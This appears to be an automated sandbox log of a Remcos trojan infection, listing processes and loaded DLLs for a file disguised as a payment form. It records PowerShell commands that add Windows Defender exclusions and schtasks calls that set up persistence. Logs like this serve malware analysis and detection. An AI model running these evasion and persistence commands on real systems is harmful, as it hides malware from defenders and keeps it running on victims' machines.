Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe C:\ProgramData\AppUpdate\remcos.exe
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: unknown | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: unknown | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: unknown | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp"
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe"
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe C:\ProgramData\AppUpdate\remcos.exe
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp"
Source: C:\ProgramData\AppUpdate\remcos.exe | Process created: C:\ProgramData\AppUpdate\remcos.exe "C:\ProgramData\AppUpdate\remcos.exe"
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: apphelp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: version.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: dwrite.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: amsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: userenv.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: msasn1.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: gpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windowscodecs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: propsys.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: edputil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: appresolver.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: bcp47langs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: slc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sppc.dll
